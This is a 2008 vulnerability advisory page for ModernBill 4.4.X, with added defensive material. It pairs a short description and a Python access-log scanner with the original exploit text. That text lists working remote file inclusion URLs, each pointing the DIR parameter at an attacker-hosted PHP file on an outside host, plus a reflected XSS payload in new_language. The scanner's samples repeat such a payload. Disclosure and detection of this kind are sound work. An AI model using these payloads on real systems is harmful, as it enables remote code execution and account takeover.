Vendor: Client Billing System
By: nigh7f411
CVSS: 8.8 (HIGH)
Title: Remote File Inclusion and Cross-Site Scripting
CWE: 94, 79
Product Name: Client Billing System
Affected Version From: 4.4.X
Affected Version To: 4.4.X
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2008

ModernBill .:. Client Billing System – User Login

ModernBill versions 4.4.X and below are vulnerable to Remote File Inclusion and Cross-Site Scripting. These are two separate issues. In the Remote File Inclusion case, the DIR parameter of several scripts under include/ (listed in the raw data below) accepts a remote URL, so the server fetches and executes PHP code hosted on an attacker-controlled host. In the Cross-Site Scripting case, the new_language parameter of the login page (index.php?op=login) is reflected into the response without escaping; an attacker sends a crafted URL to a target user, and when the user opens it the injected script runs in the context of that user's browser session, which can allow the attacker to gain access to the user's account and perform malicious activities.

Mitigation:

Upgrade to the latest version of ModernBill and apply the latest security patches.
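As an added example for defenders (not code from the advisory or from ModernBill), the following script scans web-server access log lines for the two request patterns the advisory describes: a DIR parameter carrying a remote URL, and a new_language parameter carrying quote characters or an inline event handler. The log lines and the host attacker.example are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names taken from the advisory: DIR is the include path used by
# several scripts under include/, new_language is reflected into the login page.
RFI_PARAM = "DIR"
XSS_PARAM = "new_language"
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Inline event handler such as onmouseover=... inside a parameter value.
EVENT_HANDLER = re.compile(r"on[a-z]+\s*=", re.IGNORECASE)
# Request target inside a common/combined log line, e.g. "GET /x?y HTTP/1.1".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample log lines (not real traffic).
LOG_LINES = [
    '10.0.0.5 - - [31/Oct/2008:12:00:01 +0000] "GET /include/scripts/'
    'export_batch.inc.php?DIR=http://attacker.example/x.txt? HTTP/1.1" 200 512',
    '10.0.0.5 - - [31/Oct/2008:12:00:02 +0000] "GET /index.php?op=login&'
    'username=a&password=b&new_language=%22+onmouseover=alert(1)+ HTTP/1.1" 200 2048',
    '10.0.0.9 - - [31/Oct/2008:12:00:03 +0000] "GET /index.php?op=login&'
    'username=a&password=b&new_language=en HTTP/1.1" 200 2048',
]


def classify_request(target):
    """Return (kind, path, value) findings for one request target (path + query)."""
    parts = urlsplit(target)
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already decodes once; a second decode catches double encoding.
        lowered = unquote(value).lower().lstrip()
        if name == RFI_PARAM and lowered.startswith(REMOTE_SCHEMES):
            findings.append(("rfi", parts.path, value))
        elif name == XSS_PARAM and ('"' in value or "<" in value
                                    or EVENT_HANDLER.search(value)):
            findings.append(("xss", parts.path, value))
    return findings


def scan_log(lines):
    """Return (line_number, kind, path, value) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            for kind, path, value in classify_request(match.group(1)):
                hits.append((number, kind, path, value))
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit)
```

Run it against an exported access log by replacing LOG_LINES with the file's lines; the path in each hit tells you which of the include/ scripts or the login page was targeted.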

Exploit-DB raw data:

**************************************************************************************
ModernBill .:. Client Billing System - User Login
ModernBill  <= v4.4.X Remote File Inclusion Vulnerability  and xss by nigh7f411
http://xc0r3.net/
plezz go to ttp://xc0r3.net/forums/
**************************************************************************************

rfi
http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?

xss
http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+

**************************************************************************************

# milw0rm.com [2008-10-31]